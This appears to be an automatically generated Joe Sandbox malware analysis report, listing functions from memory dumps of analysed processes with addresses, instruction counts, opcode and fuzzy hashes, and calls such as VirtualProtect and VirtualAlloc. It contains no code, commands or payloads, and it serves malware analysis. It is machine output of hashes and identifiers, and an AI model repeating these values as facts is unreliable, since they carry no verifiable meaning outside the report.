Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a651a285739add4ced1f2927a9229ac58ff63b9bd9960a91a31756ec143b21
Instruction ID: 4a027a6b04f3550d49520425e885d2909222f20a3c92b1e0c0d373e6bb3f8f34
Opcode Fuzzy Hash: a6a651a285739add4ced1f2927a9229ac58ff63b9bd9960a91a31756ec143b21
Instruction Fuzzy Hash: DCE02634B24F4C4B8B18AA2D9405072F3D1EBAD206B000A7EA48BD3360DE20FC414785

Function 00007FFD9B8E34A9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 826c2b26349c5e6220dc6552cc5a49448c9233b0e129ebeeb43c06704679403c
Instruction ID: a7a695bbdbdfc66db6bbee8dd24d621aec51d431d8d1d88ec16f45bd77af9d90
Opcode Fuzzy Hash: 826c2b26349c5e6220dc6552cc5a49448c9233b0e129ebeeb43c06704679403c
Instruction Fuzzy Hash: 44E01220709B884FC70EA62948695657BB1EFBB21278A52DBC045CB6A3ED19DC89C741

Function 00007FFD9B8ED26D Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 414205c58de343341e928d689ed2634f73f544dc51970ed1ff468cba6790c859
Instruction ID: 30700b6737a9806c26499436b039d399853804390ba3c73c253dafc9463289fc
Opcode Fuzzy Hash: 414205c58de343341e928d689ed2634f73f544dc51970ed1ff468cba6790c859
Instruction Fuzzy Hash: 6DF03031B0A60E9BE779E784C4B4BB87285DB9C365F125236D51AC71F1CE2C6A988740

Function 00007FFD9B8ED1E1 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f47443c21dc803fce1101de7947fc755ddc4f06c5f5921e85fca3145fa93788
Instruction ID: 54894f0ce903c639cf02a00639705ba3c9892c87727fd7e43a27884bcddcf9a7
Opcode Fuzzy Hash: 3f47443c21dc803fce1101de7947fc755ddc4f06c5f5921e85fca3145fa93788
Instruction Fuzzy Hash: D0F03735B0960F9BE779E790C4B0BF872D1DB9C355F514235D519871E1CE2C66884740

Function 00007FFD9B8E2239 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19b4424197aa66210bfa091ab0715fae5376f8873f102b28919ffccfbb5ced88
Instruction ID: 98d78f80ebd4ad51cf599c28ec735bfd5220a6d02066bdde08777f8c60700f44
Opcode Fuzzy Hash: 19b4424197aa66210bfa091ab0715fae5376f8873f102b28919ffccfbb5ced88
Instruction Fuzzy Hash: 04E0653160E3C04FC716DB348468854BF60EF6720174A42EEC045CF1A3DA2DCC85CB11

Function 00007FFD9B8B0CB9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8b0000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e371870c3c18374610b5b6f364cfcc1f9fe76b5faf3408189acb5f179d98f1
Instruction ID: ff2875e1810efa1543df393bc489299709d1be93d70bf59b92b4dcdf43ae071c
Opcode Fuzzy Hash: 73e371870c3c18374610b5b6f364cfcc1f9fe76b5faf3408189acb5f179d98f1
Instruction Fuzzy Hash: F5F09A70A1A64A8AE724DBA4C4A47E976A0EB54700F1442B6D008872E5DB7866848F80

Function 00007FFD9B8E7C49 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a9a166f02bffdd55fd0b6ceae8cfb2d0a145115bc082fdc3c871a11da5b5142
Instruction ID: 4c647354763dfb64eb908ed86db950c54308a823be309b405cae778971a3613b
Opcode Fuzzy Hash: 4a9a166f02bffdd55fd0b6ceae8cfb2d0a145115bc082fdc3c871a11da5b5142
Instruction Fuzzy Hash: B2E04661A4EBC04FC70A67348C698943FB09F6B21278A00EBD045CF2B3EA1DDC88C712

Function 00007FFD9B8EDAA9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bfd65ba4650870df4be14f3a1d5e92f90259553e06e31dd39aefd0328731ec7
Instruction ID: 5a7cd4fd212220497b5f25f85bd050a17c3644904ca12d495fe49cc95f0e42ad
Opcode Fuzzy Hash: 2bfd65ba4650870df4be14f3a1d5e92f90259553e06e31dd39aefd0328731ec7
Instruction Fuzzy Hash: D9E01A6198F7C44FC70B9B3588B88403F71AE5761074A51EAC085CF5B3D91A9949C701

Function 00007FFD9B8EA450 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B8EA3C0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B8C3BB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8c0000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80

Function 00007FFD9B8E9269 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 959381bc829d19c02cc4cdb2e5f9367b6590e096b2e6423345e39be0f9a5b7ea
Instruction ID: 33e498d0803e1f2d6eb8287d16e6a06a02e6deae3d8a6ce220b5c9718715b62b
Opcode Fuzzy Hash: 959381bc829d19c02cc4cdb2e5f9367b6590e096b2e6423345e39be0f9a5b7ea
Instruction Fuzzy Hash: 99E0173151A7884FC70BAB3488A99903FB0EE2B21178B01C7D049CF5B3E6298D8DC752

Function 00007FFD9B8EDA29 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3cb11bc3e183a89ef8fe1d6b046b14092b705e180098e1d6daa8e3d4d6755e
Instruction ID: 5570a488ced718ece2c0852c96150aa7c9eba369672db4f144326865d8058010
Opcode Fuzzy Hash: da3cb11bc3e183a89ef8fe1d6b046b14092b705e180098e1d6daa8e3d4d6755e
Instruction Fuzzy Hash: 45E04F2294F7C04FCB0BA73488788447F60EF1721478A41EAC085CF1B3EA298D49C701

Function 00007FFD9B8E22E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9B8EBAC0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6464a67ff091a827812a2cc836056040b56cb53019a2fd92ee05ee6071b52477
Instruction ID: 7077a03c5b552944c46bf1803499312fb566719f7f81f8fc1cc5897e8f854c9e
Opcode Fuzzy Hash: 6464a67ff091a827812a2cc836056040b56cb53019a2fd92ee05ee6071b52477
Instruction Fuzzy Hash: 65D01234B559044FC71CB73888598747391EBAE21679540A9D00BCB2B2D96ADD89C741

Function 00007FFD9B8E71A0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000038.00000002.2330964081.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_7ffd9b8e1000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698c49afc8ca5cc73860eef67dc2ba156b1e02b6bd2318f1785a3056c5b136f8
Instruction ID: cf4d6fbe001e179c24db04c69c407dd7d880ea95d281866df61696df3afd6fc7
Opcode Fuzzy Hash: 698c49afc8ca5cc73860eef67dc2ba156b1e02b6bd2318f1785a3056c5b136f8
Instruction Fuzzy Hash: 92D02234B508084FC70CB738889CC303390EB6E20278100A8D00AC73B1D92ADC88C740

Analysis Process: 0J5DzstGPi.exePID: 2520, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B8D16EA Relevance: .4, Instructions: 421
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d814f8f527e4867def30f3a637a81532710fdc418be05aa3a0402b0bb30e9c59
Instruction ID: 917a6eb34f380e30fbcd40c60f276b3aade2bcab2048c7ea45625d151db6b93c
Opcode Fuzzy Hash: d814f8f527e4867def30f3a637a81532710fdc418be05aa3a0402b0bb30e9c59
Instruction Fuzzy Hash: 75B1E021A1E69E0BE32D67694C521B07791EFD6305B5A83BFC8DF830A7DD28A51783C1

Function 00007FFD9B8A0D7C Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8a0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43baa7d68283972dab173b51e52423495f9f3b7bf7ef2cfd14f18e44fdf87f7
Instruction ID: cea35d7ad6e28a010536078b31c956fd607f905890be86a1d1ad38949efb0730
Opcode Fuzzy Hash: b43baa7d68283972dab173b51e52423495f9f3b7bf7ef2cfd14f18e44fdf87f7
Instruction Fuzzy Hash: 19911271A28A8D8FE798EB6C88657A8BBE1FF99300F4001BAD05DD72D6DF781811C751

Function 00007FFD9B8AB323 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8a4000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1228f67e5ab8da7e4f2ed65cc70cd47273a8340f1a08cd9d1ce91211c861773
Instruction ID: 2e087b4e2ea27606d29c8f9784a63887944583c565916038f0278e70018c82ac
Opcode Fuzzy Hash: d1228f67e5ab8da7e4f2ed65cc70cd47273a8340f1a08cd9d1ce91211c861773
Instruction Fuzzy Hash: 3A410931A0D7884FDB1D9BACAC166FD7BE0EF96321F0442AFD089C3193DA7564068792

Function 00007FFD9B8AB38A Relevance: 1.6, APIs: 1, Instructions: 143
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9B8AB46D

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8a4000_0J5DzstGPi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0e7adf49418dc03a0941ecf2ad7bed6795e43371109c7bb16ba8318ebd8ba4b0
Instruction ID: a242159923d5695dae1042b7f544f5b96347f1ec3b67e41b989de8be64dd2f04
Opcode Fuzzy Hash: 0e7adf49418dc03a0941ecf2ad7bed6795e43371109c7bb16ba8318ebd8ba4b0
Instruction Fuzzy Hash: 4C41193190D7894FDB1D9BA89C166E97FE0EF56321F0443AFD099C3193DA746406C792

Function 00007FFD9B8AC215 Relevance: 1.5, APIs: 1, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8a4000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1227d5392d45605aea7cdb6c46c05b4f73eea8c2c0fc4b147e84e3012ebdda72
Instruction ID: e726e6b3ec85e9ee7773904bae9a86293b208917ffaea53af9ec0e8095862020
Opcode Fuzzy Hash: 1227d5392d45605aea7cdb6c46c05b4f73eea8c2c0fc4b147e84e3012ebdda72
Instruction Fuzzy Hash: 11512A31B1DA4D0FDB5CE76C985A6B977D1EB99320F0041BEE44EC3293DE24A8428791

Function 00007FFD9B8AC361 Relevance: 1.4, APIs: 1, Instructions: 124
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFD9B8AC414

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8a4000_0J5DzstGPi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d287f6c1e29713fa6bca01f25b4bae290ace5db36f74182418a0f1e1b715b828
Instruction ID: 637167498d28615ec2c7231a739c243bc161436b9e022a62c8648e0a53489f03
Opcode Fuzzy Hash: d287f6c1e29713fa6bca01f25b4bae290ace5db36f74182418a0f1e1b715b828
Instruction Fuzzy Hash: C531E931A0DB8C4FDB1DEB68981A6F97BF0EF56321F04426FD089C3152DA646916CB91

Function 00007FFD9B8DB2C0 Relevance: 1.3, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 00007FFD9B8DB2C3

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 493f17958adc208350773f86d5b4450495a89997a6a256d1abd57743c9a40b72
Instruction ID: 90f38f98e7be321e2c7d6dbd18cc2c26d715335edbc5bf368c4b03ce08581ad6
Opcode Fuzzy Hash: 493f17958adc208350773f86d5b4450495a89997a6a256d1abd57743c9a40b72
Instruction Fuzzy Hash: 2B212851B19A4E4BE79CA79844B56B832C6EFDC340F55037BD00DC71A7DE28A8428301

Function 00007FFD9B8D34A9 Relevance: 1.3, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9B8D34C6

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 83b486e3c5cf186e2e90c4d37a1392c603d66c07576d012d0d092bfb049123ee
Instruction ID: aa5635686581928613b46fcde8b0774bd4df3fadaa68080da6173d01ad978d0f
Opcode Fuzzy Hash: 83b486e3c5cf186e2e90c4d37a1392c603d66c07576d012d0d092bfb049123ee
Instruction Fuzzy Hash: BCF0306150F7C44FC716AA3488694557F61AE6720174A52EFC045CB1A3DA1D9889C701

Function 00007FFD9B8DA439 Relevance: 1.3, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9B8DA456

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 8a404f4fac4729b358b30bdb67e59ebb65f04955d1db1d12df2703d36ccd0165
Instruction ID: 9b8ac927c0e1875a60680e4820e88a4d42fa7380180ce448384393bc44be7c4e
Opcode Fuzzy Hash: 8a404f4fac4729b358b30bdb67e59ebb65f04955d1db1d12df2703d36ccd0165
Instruction Fuzzy Hash: 91F06D6160F7C44FCB1AAB3588698547FA0EF6B60174A52EFC185CF1A3EA2DD889C701

Function 00007FFD9B8DA3A9 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9B8DA3C6

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: dab78bdf20f80aa3af3c488a902b2e6c11ddb7a02a926c68c5ac14a821304ed1
Instruction ID: 0fb0f0109c3bf411fad7e9bffff1ee751e68a0f2aa3900a7da2e8a900bb1d942
Opcode Fuzzy Hash: dab78bdf20f80aa3af3c488a902b2e6c11ddb7a02a926c68c5ac14a821304ed1
Instruction Fuzzy Hash: AEE06D71A0F7C44FCB1AAA348869454BFA1EF6720174A56EFC045CF1A7EA2DD889C701

Function 00007FFD9B8DAC69 Relevance: 1.3, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9B8DAC86

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: b4f2051b2b82244e4f5dc34db57c1a3572b62c36201b2f9d4b8bff682854134d
Instruction ID: 8ce548f80a95c12f34acf17b4d76636067db136c0070eaafb7ac377b4432e3ca
Opcode Fuzzy Hash: b4f2051b2b82244e4f5dc34db57c1a3572b62c36201b2f9d4b8bff682854134d
Instruction Fuzzy Hash: 23E0656140F3C44FCB06AB3588698043FA0AE6B21078A42EFC189CB1B3E6298889C701

Function 00007FFD9B8D22C9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9B8D22E6

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 74036a77fde6f7e0d890ed405012bc98600d3554288e5668a97bb02c452c6b5a
Instruction ID: 41fb85e12e11e68623e3610430de7cfd5a736bda3533ad4c4c3c12e198b3ab01
Opcode Fuzzy Hash: 74036a77fde6f7e0d890ed405012bc98600d3554288e5668a97bb02c452c6b5a
Instruction Fuzzy Hash: 03E01A7194E7C44FCB16EB74887A8457FA0AE6B31178B41EEC085CF1B3E62D9849C702

Function 00007FFD9B8D80D9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9B8D80F6

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: bf5046728a05171ed5ec299c25e685592ede4c0a4c752e472b833fd3ea881624
Instruction ID: 65ae82b70b6fa66341e43ab9651a60f3903c86df44a63e5531b4e5290eba62be
Opcode Fuzzy Hash: bf5046728a05171ed5ec299c25e685592ede4c0a4c752e472b833fd3ea881624
Instruction Fuzzy Hash: 29E01A7154E7C44FCB16EB7488698457FA0EE6B21078B45EEC089CF1B3E62D8849C701

Function 00007FFD9B8B07E6 Relevance: 1.0, Instructions: 985
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd0a8f28631ce042d02a4125743f5d489c8357e4b91a8c7728cc7397c844ae4
Instruction ID: 913615ff08a282754196c33a7fd827983f3c391b1dcafe39fcee4f574e4acc55
Opcode Fuzzy Hash: 4cd0a8f28631ce042d02a4125743f5d489c8357e4b91a8c7728cc7397c844ae4
Instruction Fuzzy Hash: 5762E731B2991E4FEBA8FB6894B16B87392FF98740F154579D01DC32E6DE287D418B80

Function 00007FFD9B8D393D Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3adc48e55ff13667a96c494967c27233485b35244267ad451a384583f7473bb5
Instruction ID: 2a3875e4a8a1cb9b048c9835c18015d5c0abf80201a3ab2a9b6a819b4f683bbb
Opcode Fuzzy Hash: 3adc48e55ff13667a96c494967c27233485b35244267ad451a384583f7473bb5
Instruction Fuzzy Hash: 8781E561B1DA4E0FEBACEB5894767B572D2EF98350F05437AD40DC32D7EE28A9424241

Function 00007FFD9B8B1045 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5075c323f23fd12e2e955ecfd139b54b0ef4d31ed9b08694141731803dee595
Instruction ID: 1806da3013dde10cf7ae64a7f641972404c2d5f63d3507022688215aea484e72
Opcode Fuzzy Hash: f5075c323f23fd12e2e955ecfd139b54b0ef4d31ed9b08694141731803dee595
Instruction Fuzzy Hash: B691F831F2D91A4BE76CFB6894A167873A1FF98340F1145B9D01EC71DBDE38A9428B81

Function 00007FFD9B8D3993 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82d5496410ce3bc88fcb9617ec28abb77571cc98215959e16975b32b583bb5c2
